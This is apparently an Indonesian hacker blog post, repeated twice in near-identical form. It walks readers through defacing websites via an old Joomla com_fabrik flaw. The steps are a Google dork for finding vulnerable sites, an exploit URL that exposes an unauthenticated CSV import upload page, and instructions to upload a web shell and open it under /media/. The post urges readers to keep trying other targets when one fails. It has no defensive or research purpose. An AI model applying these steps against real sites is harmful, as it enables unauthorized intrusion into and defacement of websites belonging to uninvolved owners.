Nah, kali ini saya cuma mau berbagi saja tentang Exploit Joomla, walaupun ini bugs lama, tapi masih bisa juga digunakan untuk depes2,, wkwkwk :D
Sebelumnya sedikit Nasihat dari saya :
"Tidak semua website bisa dengan teknik ini, harap selalu mencari dan mencoba! karena dalam dunia Hacking tidak ada yg instants dan bisa berhasil dengan mudah! Mereka yg berhasil adalah mereka yg selalu sabar berusaha dan terus mencoba!"
Oke, langsung aja... Berikut langkah2nya:
1. Gunakan Dork untuk mencari Target di Google
inurl:index.php?option=com_fabrik
2. Selanjutnya Pilih target sobat, disini ane udah nemu target... langsung aja di eksploitasi :D
3. Masukin exploitnya berikut;
index.php?option=com_fabrik&c=import&view=import&filetype=csv&tableid=1echercher
maka akan muncul halaman upload seperti gambar berikut:
Note: Kalo tidak muncul halaman seperti gambar atau error, silahkan cari target yg lain! :p
4. upload shell sobat, klik Browse dan pilih shell sobat lalu klik Import CSV
5. Setelah itu lihat hasil upload shell sobat di http://site.com/media/shell.php
Note: Kalo ga berhasil atau error, cari target lain aja :D
Sebelumnya sedikit Nasihat dari saya :
"Tidak semua website bisa dengan teknik ini, harap selalu mencari dan mencoba! karena dalam dunia Hacking tidak ada yg instants dan bisa berhasil dengan mudah! Mereka yg berhasil adalah mereka yg selalu sabar berusaha dan terus mencoba!"
Oke, langsung aja... Berikut langkah2nya:
1. Gunakan Dork untuk mencari Target di Google
inurl:index.php?option=com_fabrik
2. Selanjutnya Pilih target sobat, disini ane udah nemu target... langsung aja di eksploitasi :D
3. Masukin exploitnya berikut;
index.php?option=com_fabrik&c=import&view=import&filetype=csv&tableid=1echercher
maka akan muncul halaman upload seperti gambar berikut:
4. upload shell sobat, klik Browse dan pilih shell sobat lalu klik Import CSV
5. Setelah itu lihat hasil upload shell sobat di http://site.com/media/shell.php
Note: Kalo ga berhasil atau error, cari target lain aja :D